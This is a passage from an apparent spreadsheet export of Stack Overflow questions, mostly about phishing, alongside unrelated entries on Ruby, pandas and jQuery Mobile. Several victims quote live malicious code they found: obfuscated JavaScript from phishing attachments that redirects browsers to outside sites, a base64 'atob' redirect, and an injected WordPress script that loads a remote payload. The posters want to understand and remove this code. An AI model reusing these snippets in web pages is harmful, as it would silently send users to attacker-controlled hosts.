 &lt;pre&gt;&lt;code&gt;&amp;lt;script type='text/javascript'&amp;gt;function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart&amp;gt;iro6nD'.replace(/[Dr\]6\&amp;gt;]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;What did it do? It's beyond the scope of my programming knowledge.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to properly use Gophish python API to avoid this Json mess?</t>
  </si>
  <si>
    <t>&lt;p&gt;So, I am trying to use the Gophish with my Python 3.7 project to allow users to create campaigns, profiles and all the good stuff you can normaly do in the UI. So looking at the package documentation, I tried using the code to create a new campaign or user group or anything, but I keep getting a JSON error.&lt;/p&gt;
 &lt;p&gt;Using python 3.7, with Gophish 0.7.1, tried changing names or even using direct input instead of hardcoded values, none of this solve anything, and I quite don't understand the Json at all, all I want is my python program to work&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;def newCampaign():
  groups = [Group(name='testgroup')]
  page = Page(name='Linkedin')
  template = Template(name='Linkedin')
  smtp = SMTP(name='LinkedIN')
  url = 'http://192.168.1.20'
  campaign = Campaign(name='Example Campaign', groups=groups, page=page, template=template, smtp=smtp)
  campaign = api.campaigns.post(campaign)
 newCmpgnBut = Button(self, text="NEW CAMPAIGN", command=newCampaign(), bg='black', fg='white')
 newCmpgnBut.pack()
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I expect this to create a new campaign in my Gophish, instead all I get is this messy lot:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;File "/PycharmProjects/PenTester2.0/phishing.py", line 45, in &amp;lt;module&amp;gt;
  newCmpgnBut = Button(self, text="NEW CAMPAIGN", command=newCampaign(), bg='black', fg='white')
  File "/PycharmProjects/PenTester2.0/phishing.py", line 40, in newCampaign
  campaign = api.campaigns.post(campaign)
  File "/usr/local/lib/python3.7/dist-packages/gophish/api/campaigns.py", line 20, in post
  return super(API, self).post(campaign)
  File "/usr/local/lib/python3.7/dist-packages/gophish/api/api.py", line 92, in post
  raise Error.parse(response.json())
  File "/usr/lib/python3/dist-packages/requests/models.py", line 897, in json
  return complexjson.loads(self.text, **kwargs)
  File "/usr/lib/python3.7/json/__init__.py", line 348, in loads
  return _default_decoder.decode(s)
  File "/usr/lib/python3.7/json/decoder.py", line 337, in decode
  obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "/usr/lib/python3.7/json/decoder.py", line 355, in raw_decode
  raise JSONDecodeError("Expecting value", s, err.value) from None
 json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)
 Process finished with exit code 1
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;json&gt;</t>
  </si>
  <si>
    <t>I am thinking Web Crawler but how to start?</t>
  </si>
  <si>
    <t>&lt;p&gt;I am working at a company that deals with phish and fake Facebook accounts. I want to show my dedication to the "mission". We are unable to passively monitor facebook pages for when they are removed. I am thinking a web crawler but I am curious on how to design one that constant checks a specific link to see if the Facebook page is still active or not? I hope this made sense? &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;facebook&gt;</t>
  </si>
  <si>
    <t>Chrome Extension runs only once</t>
  </si>
  <si>
    <t>&lt;p&gt;I just started creating Chrome Extensions and I wanted to write one which deletes messages on the site Dota-Trade.com which include phishing links.&lt;/p&gt;
 &lt;p&gt;I got everything working except that the script only removes the messages if I press &lt;kbd&gt;F5&lt;/kbd&gt;. If I navigate through the site and click on 'Messages' just nothing happens. How can I change this?&lt;/p&gt;
 &lt;p&gt;manifest.json&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;{
  "name": "Dota-Trade.com Fake Link Blocker",
  "version": "2",
  "manifest_version": 2,
  "description": "Deletes content which contain urls except official ones. By Trojan.",
  "content_scripts": [
  {
  "matches": [
  "http://dota-trade.com/messages"],
  "js": ["main.js"],
  "run_at": "document_end",
  "all_frames": true
  }
  ]
 }
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And my main.js&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;function remove(){
  var div = document.getElementById("threads");
  var messages = div.getElementsByClassName("message te clear");
  for (var i=0; i &amp;lt; messages.length; i++) {
  rp = messages[i].getElementsByClassName("rp");
  messagetextobj = rp[0].getElementsByClassName("text");
  var messagetext = messagetextobj[0].textContent;
  if (messagetext.indexOf(".com/profiles") &amp;gt; -1 &amp;amp;&amp;amp; messagetext.indexOf("steamcommunity.com") == -1) {
  div.removeChild(messages[i]);
  };
  }
  setTimeout(function(){remove();},500);
 }
 remove();
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;google-chrome&gt;&lt;google-chrome-extension&gt;&lt;load&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Getting discord webhook from site</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there a way to get a Discord webhook from a site? I know of a phishing site that prompts you for your name and password, which it then sends to a Discord server. Last time they were using JavaScript for the webhook so it was easy to find it and delete. Now they are using PHP. Is it possible to find the webhook?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;php&gt;&lt;discord&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Ruby NoMethodError exception calls #inspect by default</t>
  </si>
  <si>
    <t>&lt;p&gt;I have found a weird problem in Ruby and I'm not quite sure if it is an issue or it's a feature introduced in recent Ruby versions.&lt;/p&gt;
 &lt;p&gt;Basically when we call an undefined method, we get an &lt;code&gt;undefined method&lt;/code&gt; error as expected in Ruby. The issue is that it also calls &lt;code&gt;inspect&lt;/code&gt; and prints out the object and all of its attributes/values. If my object is a complex one, it takes really long time to finish printing everything out and in many times it causes my local rails server to hang, especially when there is an attribute holding binary data. This issue does not seem to happen with Ruby 2.6 but Ruby &amp;gt;= 2.7.&lt;/p&gt;
 &lt;p&gt;For simple objects, that's not a problem but I'm specifically having the issue with this gem: &lt;code&gt;puppeteer-ruby&lt;/code&gt;. Each object in this gem has lots of attributes and dependencies.&lt;/p&gt;
 &lt;p&gt;Here is an example, I run the following code in IRB with different Ruby version and getting different exceptions:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;require 'puppeteer-ruby'
 browser = Puppeteer.launch(headless: true)
 browser.foo
 &lt;/code&gt;&lt;/pre&gt;
 &lt;h2&gt;Ruby 2.6.6&lt;/h2&gt;
 &lt;pre&gt;&lt;code&gt;NoMethodError: undefined method `foo' for #&amp;lt;Puppeteer::Browser:0x00007fce2d553b30&amp;gt;
 Did you mean? for
 &lt;/code&gt;&lt;/pre&gt;
 &lt;h2&gt;Ruby 3.0.0&lt;/h2&gt;
 &lt;pre&gt;&lt;code&gt;(irb):9:in `&amp;lt;main&amp;gt;': undefined method `foo' for #&amp;lt;Puppeteer::Browser:0x00007f9300550740 @ignore_https_errors=false, @default_viewport=#&amp;lt;Puppeteer::Viewport:0x00007f92ffbf8e90 @width=800, @height=600, @device_scale_factor=1.0, @is_mobile=false, @has_touch=false, @is_landscape=false&amp;gt;, @process=#&amp;lt;Puppeteer::BrowserRunner::BrowserProcess:0x00007f92fc5ae448 @spawnargs=[&amp;quot;/Applications/Google Chrome.app/Contents/MacOS/Google Chrome&amp;quot;, &amp;quot;--disable-background-networking&amp;quot;, &amp;quot;--enable-features=NetworkService,NetworkServiceInProcess&amp;quot;, &amp;quot;--disable-background-timer-throttling&amp;quot;, &amp;quot;--disable-backgrounding-occluded-windows&amp;quot;, &amp;quot;--disable-breakpad&amp;quot;, &amp;quot;--disable-client-side-phishing-detection&amp;quot;, &amp;quot;--disable-component-extensions-with-background-pages&amp;quot;, &amp;quot;--disable-default-apps&amp;quot;, &amp;quot;--disable-dev-shm-usage&amp;quot;, &amp;quot;--disable-extensions&amp;quot;, &amp;quot;--disable-features=Translate&amp;quot;, &amp;quot;--disable-hang-monitor&amp;quot;, &amp;quot;--disable-ipc-flooding-protection&amp;quot;, &amp;quot;--disable-popup-blocking&amp;quot;, &amp;quot;--disable-prompt-on-repost&amp;quot;, &amp;quot;--disable-renderer-backgrounding&amp;quot;, &amp;quot;--disable-sync&amp;quot;, &amp;quot;--force-color-profile=srgb&amp;quot;, &amp;quot;--metrics-recording-only&amp;quot;, &amp;quot;--no-first-run&amp;quot;, &amp;quot;--enable-automation&amp;quot;, &amp;quot;--password-store=basic&amp;quot;, &amp;quot;--use-mock-keychain&amp;quot;, &amp;quot;--enable-blink-features=IdleDetection&amp;quot;, &amp;quot;--headless&amp;quot;, &amp;quot;--hide-scrollbars&amp;quot;, &amp;quot;--mute-audio&amp;quot;, &amp;quot;about:blank&amp;quot;, &amp;quot;--remote-debugging-port=0&amp;quot;, &amp;quot;--user-data-dir=/var/folders/qn/kx4kb8xx5x13gx77yy2q56fr0000gn/T/puppeteer_dev_chrome_profile-20210910-25051-m7mnxb&amp;quot;], @stdout=#&amp;lt;IO:fd 24&amp;gt;, @stderr=#&amp;lt;IO:fd 26&amp;gt;,......very long text after this..
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;ruby&gt;&lt;puppeteer&gt;</t>
  </si>
  <si>
    <t>Just opened an HTM file with the following code, is it dangerous?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received an email from an unknown person and opened an htm file in the attachment file. The following code executed :&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;frameset onpageshow=&amp;quot;document.location.replace(window.atob('aHR0cHM6Ly9tdXNrLmJ0Y2RvbmF0dmVyLnNpdGUvPzI0NDc1NTgg'));&amp;quot;&amp;gt; 
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Did I just execute something that could harm my computer ?&lt;/p&gt;
 &lt;p&gt;Thank you,&lt;/p&gt;
 &lt;p&gt;Thomas&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;javascript&gt;&lt;security&gt;&lt;malware&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Phishing and Spam</t>
  </si>
  <si>
    <t>&lt;p&gt;i created a small application that sends email to my users, however when i upload it to my server it get's deleted because of the anti-virus anyone can tell me how i can prevent that? i tried to look for the anti-virus configuration and i did not know how!&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;My server is Linux Red Hat, and when it get deleted a popup comes that the script is a PHP-MAILER-7
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Also, when i send emails using this application, they arrive in JUNK and considered as spam from hotmail, any suggestions for that?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Joomla : social engineering content detected</t>
  </si>
  <si>
    <t>&lt;p&gt;Google is saying I have a social engineering content in my joomla 3 web site. This is the URL &lt;/p&gt;
 &lt;p&gt;plombier-chauffagistes[&lt;strong&gt;DOT&lt;/strong&gt;]fr/ppp/79629b8a3ff4b34eb8db788c68d680ce/login.php?cmd=_login-run&amp;amp;dispatch=5885d80a13c0db1f1ff80d546411d7f8a8350c132bc41e0934cfc023d4e8f9e5 &lt;/p&gt;
 &lt;p&gt;You can try to open this URL in google chrome : it will display an error :(&lt;br&gt;
 I can't fix the problem : the "ppp" folder does not exists, I made some rewrite rules in .htaccess, I also tried to delete .htaccess, but the problem still remains.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;joomla&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to solve wordpress redirection hacks attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;My website &lt;a href="https://spicecarts.in" rel="nofollow noreferrer"&gt;https://spicecarts.in&lt;/a&gt; just now got hacked! It is redirecting to other sites!
 I checked with this tool &lt;a href="https://sitecheck.sucuri.net/results/https/spicecarts.in" rel="nofollow noreferrer"&gt;https://sitecheck.sucuri.net/results/https/spicecarts.in&lt;/a&gt;
 and found the errors
 1.Known javascript malware: malware.injection?35.27&lt;/p&gt;
  Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
 &lt;p&gt;Redirects to &lt;a href="https://spicecarts.in/" rel="nofollow noreferrer"&gt;https://spicecarts.in/&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;2.This page includes a JavaScript/iframe from letsmakeparty3.ga that is blacklisted by Sucuri Labs, reason: injected script, see &lt;a href="https://labs.sucuri.net/?blacklist=letsmakeparty3.ga" rel="nofollow noreferrer"&gt;https://labs.sucuri.net/?blacklist=letsmakeparty3.ga&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://allow.letsmakeparty3.ga/request?Type=api&amp;amp;query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js" rel="nofollow noreferrer"&gt;https://allow.letsmakeparty3.ga/request?Type=api&amp;amp;query=034/wp-content/plugins/super-progressive-web-apps/public/js/register-sw.js&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;3.In &lt;a href="https://spicecarts.in/wp-includes/css/" rel="nofollow noreferrer"&gt;https://spicecarts.in/wp-includes/css/&lt;/a&gt; malware found as below&lt;/p&gt;
  Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
 &lt;p&gt;How to solve this!&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wordpress&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to verify installed application in runtime to prevent phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have a payment application in my device, my application connect to that application's service to get a pending-intent for launch payment activity and then listen to result in onActivityResult() method.(similar to In-App-Purchase scenario)&lt;/p&gt;
 &lt;p&gt;I set package name for payment intent. but you know, it's not guarantee payment application is trusted. if some one install fake application through unknown source with same package name and same aidl-service implementation then it can give me pending-intent and phishing my user info.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;I verify payment result with some mechanism and that only safe my application from fake payment result but my application user enter their data in phisher application.&lt;/em&gt; (this paragraph say my problem is not trusting response of payment application, &lt;strong&gt;my problem is trusting payment application before launch their activity&lt;/strong&gt;)&lt;/p&gt;
 &lt;p&gt;I know some approach that i can check other application signature and public key. &lt;strong&gt;if&lt;/strong&gt; Android OS &lt;strong&gt;guarantee that public key and signature is read-only and matched for installed application&lt;/strong&gt;, i can rely on that and check public key of payment application before sending intent to that.but i guess those is not ready-only and check match only in installing.&lt;/p&gt;
 &lt;p&gt;any suggestion (similar or different approach) for prevent phishing attack ? &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Updated&lt;/strong&gt;:
 about 50% of application's user install application from my corporation website directly (Unknown-Source).&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;security&gt;&lt;android-intent&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Converting list to data frame doesn't work</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm having difficulty in converting lists into dataframe after a loop. I was getting results for the first 3 lines, however the rest of the output are NaN values.
 Here's my code. Any help is much appreciated. Thank you&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; for i in range(0,5000):
  data=data_phished[&amp;quot;url&amp;quot;][i]
  if not urlparse(data).scheme:
  url = 'https://' + data
  print(i),print(url)
  urlRequest.append(fe.urlRequest(url,soup,hostname))
  urlAnchor.append(fe.urlAnchor(url,soup,hostname))
  linksTags.append(fe.linksTags(url))
  sfh.append(fe.sfh(url,soup,hostname))
  emailSubmit.append(fe.emailSubmit(url))
  urlAbnormal.append(fe.urlAbnormal(url,hostname))
  #Storing extracted features in a list
  label = []
  for i in range(0,5000):
  label.append(1)
  #Converting the list to dataframe
  feat_col = {'request_url':pd.Series(urlRequest), 'anchor_url':pd.Series(urlAnchor),'links_in_tags':pd.Series(linksTags),'server_from_handler':pd.Series(sfh),'submit_info_email':pd.Series(emailSubmit),'abnormal_url':pd.Series(urlAbnormal),'class':pd.Series(label)}
  abn = pd.DataFrame(feat_col)
  abn
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;And this is the ouput I'm getting (attached)
 [1]: &lt;a href="https://i.stack.imgur.com/uMWwB.png" rel="nofollow noreferrer"&gt;https://i.stack.imgur.com/uMWwB.png&lt;/a&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;python&gt;&lt;pandas&gt;&lt;dataframe&gt;</t>
  </si>
  <si>
    <t>Emails sent using Gmail API are being flagged as phishy by Gmail</t>
  </si>
  <si>
    <t>&lt;p&gt;When I send an email using the &lt;em&gt;Gmail API&lt;/em&gt;, recipients that are using the Gmail web interface are getting a &lt;code&gt;phishing&lt;/code&gt; warning when they open the email. &lt;/p&gt;
 &lt;p&gt;However, when I send the exact same email content through the same Gmail account but using the &lt;em&gt;web UI&lt;/em&gt;, the recipients do not get the &lt;code&gt;phishing&lt;/code&gt; warning. &lt;/p&gt;
 &lt;p&gt;The only difference I can find between the two received emails, is that the one sent using the API has this additional header:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from 114692869688 named unknown by gmailapi.google.com with HTTPREST; Tue, 11 Jun 2019 11:37:51 -0500
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Does anyone know how to resolve this problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>What does this Javascript do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've just found out that a spammer is sending email from our domain name, pretending to be us, saying:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Dear Customer,&lt;/p&gt;
  &lt;p&gt;This e-mail was send by ourwebsite.com
  to notify you that we have temporanly
  prevented access to your account.&lt;/p&gt;
  &lt;p&gt;We have reasons to beleive that your
  account may have been accessed by
  someone else. Please run attached file
  and Follow instructions.&lt;/p&gt;
  &lt;p&gt;(C) ourwebsite.com (I changed that)&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The attached file is an HTML file that has the following javascript:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script type='text/javascript'&amp;gt;function mD(){};this.aB=43719;mD.prototype = {i : function() {var w=new Date();this.j='';var x=function(){};var a='hgt,t&amp;lt;pG:&amp;lt;/&amp;lt;/gm,vgb&amp;lt;lGaGwg.GcGogmG/gzG.GhGtGmg'.replace(/[gJG,\&amp;lt;]/g, '');var d=new Date();y="";aL="";var f=document;var s=function(){};this.yE="";aN="";var dL='';var iD=f['lOovcvavtLi5o5n5'.replace(/[5rvLO]/g, '')];this.v="v";var q=27427;var m=new Date();iD['hqrteqfH'.replace(/[Htqag]/g, '')]=a;dE='';k="";var qY=function(){};}};xO=false;var b=new mD(); yY="";b.i();this.xT='';&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Another email had this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;script type='text/javascript'&amp;gt;function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart&amp;gt;iro6nD'.replace(/[Dr\]6\&amp;gt;]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;&amp;lt;/script&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;Can anyone tells me what it does? So we can see if we have a vulnerability, and if we need to tell our customers about it ...&lt;/p&gt;
 &lt;p&gt;Thanks&lt;/p&gt;</t>
  </si>
  <si>
    <t>Didnt realize "aspx?URL=http://cuz.pw/" added to url. Am i scammed?</t>
  </si>
  <si>
    <t>&lt;p&gt;I just googled a website and sent my login&amp;amp;password. But just after i realized that at the end of url of website there was an extra &amp;quot;aspx?URL=http://cuz.pw/&amp;quot;&lt;/p&gt;
 &lt;p&gt;So what does it stand for? Is my login information was sent to somewhere else and stolen?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;asp.net&gt;&lt;url&gt;&lt;redirect&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Navbar button sizes in JQuery Mobile</t>
  </si>
  <si>
    <t>&lt;p&gt;I am trying to create a navbar in JQuery Mobile for an app that will run in iOS. My code is shown below. When I run the app, the three options appear. However, they are all scrunched to the left side. I want the three options to fill the available space in the footer. What am I doing wrong? I just using the glyphish icons that were referenced in the jquery mobile page. Thank you for your help!&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;&amp;lt;style type="text/css"&amp;gt;
  .navbar .ui-btn .ui-btn-inner { padding-top: 40px !important; }
  .navbar .ui-btn .ui-icon { width: 30px!important; height: 30px!important; margin-left: -15px !important; box-shadow: none!important; -moz-box-shadow: none!important; -webkit-box-shadow: none!important; -webkit-border-radius: 0 !important; border-radius: 0 !important; } 
  #navButton1 .ui-icon { background: url(/navbar/option1.png) 50% 50% no-repeat; background-size: 24px 22px; }
  #navButton2 .ui-icon { background: url(/navbar/option2.png) 50% 50% no-repeat; background-size: 24px 22px; } 
  #navButton3 .ui-icon { background: url(/navbar/option3.png) 50% 50% no-repeat; background-size: 24px 22px; } 
 &amp;lt;/style&amp;gt;
 ...
 &amp;lt;div id="myPage" data-role="page"&amp;gt;
  &amp;lt;div data-role="header" data-position="fixed"&amp;gt;
  &amp;lt;h1&amp;gt;My App&amp;lt;/h1&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="content"&amp;gt;
  &amp;lt;!-- My Content --&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;div data-role="footer" data-position="fixed" class="navbar"&amp;gt;
  &amp;lt;div id="myNavbar" data-role="navbar" class="navbar" data-grid="d"&amp;gt;
  &amp;lt;ul&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="navButton1" data-icon="custom" class="ui-btn-active ui-state-persist"&amp;gt;Option 1&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="option2.html" id="navButton2" data-icon="custom" rel="external" data-transition="none"&amp;gt;Option 2&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;&amp;lt;a href="option3.html" id="navButton3" data-icon="custom" rel="external" data-transition="none"&amp;gt;Option 3&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
  &amp;lt;/div&amp;gt;
  &amp;lt;/div&amp;gt;
 &amp;lt;/div&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;css&gt;&lt;jquery-mobile&gt;</t>
  </si>
  <si>
    <t>Understanding SPF and mail forwarding</t>
  </si>
  <si>
    <t>&lt;p&gt;Situation:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;i use my own mydomain.de for sending and receiving mails&lt;/li&gt;
 &lt;li&gt;my mail is info@mydomain.de&lt;/li&gt;
 &lt;li&gt;mydomain.de is not a relay&lt;/li&gt;
 &lt;li&gt;i forward received mails via postfix alias to a gmail account
 &lt;ul&gt;
 &lt;li&gt;the alias info@mydomain.de -&amp;gt; myname@gmail.com&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/li&gt;
 &lt;li&gt;mydomain.de has an SPF entry: &lt;code&gt;v=spf1 mx -all&lt;/code&gt;&lt;/li&gt;
 &lt;li&gt;mx entry on mydomain.de is: mydomain.de&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Problem:
 Sometimes gmail rejects the emails forwarded from my postfix.&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;E624BAC: to=&amp;lt;myname@gmail.com&amp;gt;, orig_to=&amp;lt;info@mydomain.de&amp;gt;, relay=gmail-smtp-in.l.google.com[142.250.102.26]:25, delay=1.1, delays=0.51/0.04/0.11/0.41, dsn=5.7.26, status=bounced (host gmail-smtp-in.l.google.com[142.250.102.26] said: 550-5.7.26 The MAIL FROM domain [some-sender-domain.de] has an SPF record 550-5.7.26 with a hard fail policy (-all) but it fails to pass SPF checks with 550-5.7.26 the ip: [MY-IP-ADDRESS]. To best protect our users from spam and 550-5.7.26 phishing, the message has been blocked. Please visit 550-5.7.26 https://support.google.com/mail/answer/81126#authentication for more 550 5.7.26 information. de37-20020a1709069be500b23421fc6a72f7si8409808ejc.679 - gsmtp (in reply to end of DATA command))
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The some-sender-domain.de has it's own SPF entry.&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;What is the problem?&lt;/li&gt;
 &lt;li&gt;Why is gmail thinking that this is not a forwarded mail, but a mail originating from my server? Sure the SPF check fails in that case.&lt;/li&gt;
 &lt;li&gt;How can i fix that?&lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;gmail&gt;&lt;postfix-mta&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>Why do websites caution against external links?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have seen it in multiple websites like &lt;strong&gt;Steam&lt;/strong&gt; or &lt;strong&gt;Hackerrank&lt;/strong&gt;. When I click an external link, it redirects to a new page and gives a warning like,&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;You are about to visit an external link, proceed with caution&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Is it to prevent phishing or is it some kind of pagerank retaining trick?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;</t>
  </si>
  <si>
    <t>jquery mobile glyphish icons not displaying icon container background when using local images</t>
  </si>
  <si>
    <t>&lt;p&gt;I have my icons all setup in my footer using the glyphish icon sets pointing to the demo page glyphish.com/images/demo.png.&lt;/p&gt;
 &lt;p&gt;However when I download the images and use my own the container images do not display, jsfiddle with code for demo:&lt;/p&gt;
 &lt;p&gt;&lt;a href="http://jsfiddle.net/NkjQr/1322/" rel="nofollow"&gt;http://jsfiddle.net/NkjQr/1322/&lt;/a&gt; &lt;/p&gt;
 &lt;pre&gt;&lt;code&gt; &amp;lt;div data-role="footer" class="nav-glyphish-example" data-position="fixed"&amp;gt; 
  &amp;lt;div data-role="navbar" class="nav-glyphish-example" data-grid="d"&amp;gt; 
  &amp;lt;ul&amp;gt; 
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="favorite" data-icon="custom" &amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="recent" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="contacts" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="keypad" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;li&amp;gt;&amp;lt;a href="#" id="voicemail" data-icon="custom"&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/li&amp;gt; 
  &amp;lt;/ul&amp;gt; 
  &amp;lt;/div&amp;gt; 
  &amp;lt;/div&amp;gt; 
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
